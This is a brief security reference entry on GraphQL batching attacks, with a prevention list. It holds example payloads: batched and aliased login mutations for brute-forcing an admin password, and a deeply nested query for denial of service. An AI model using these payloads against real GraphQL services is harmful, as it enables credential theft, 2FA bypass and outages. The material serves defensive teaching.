GraphQL Batching Attack

GraphQL Batching Attack exploits GraphQL's ability to execute multiple operations in a single request. Attackers abuse this to bypass rate limiting, brute-force credentials, or cause denial of service.

Attack Types

Query Batching for Brute Force

# Single request tests multiple credentials
[
  {"query": "mutation { login(user:\"admin\", pass:\"password1\") { token }}"},
  {"query": "mutation { login(user:\"admin\", pass:\"password2\") { token }}"},
  {"query": "mutation { login(user:\"admin\", pass:\"password3\") { token }}"},
  # ... hundreds more in one request
]

Alias-Based Batching

# Multiple operations using aliases in single query
query {
  a1: login(user: "admin", pass: "pass1") { token }
  a2: login(user: "admin", pass: "pass2") { token }
  a3: login(user: "admin", pass: "pass3") { token }
  # ... continue with more aliases
}

Resource Exhaustion

# Deep nesting causes exponential database queries
query {
  users {
    friends {
      friends {
        friends {
          posts { comments { author { posts { ... }}}}
        }
      }
    }
  }
}

Security Impact

Rate limit bypass (one request, many operations)
Credential brute forcing at scale
OTP/2FA code enumeration
Denial of service through query complexity

Prevention

Limit batch size / operations per request
Implement query complexity analysis
Rate limit by operation count, not just requests
Set depth and breadth limits on queries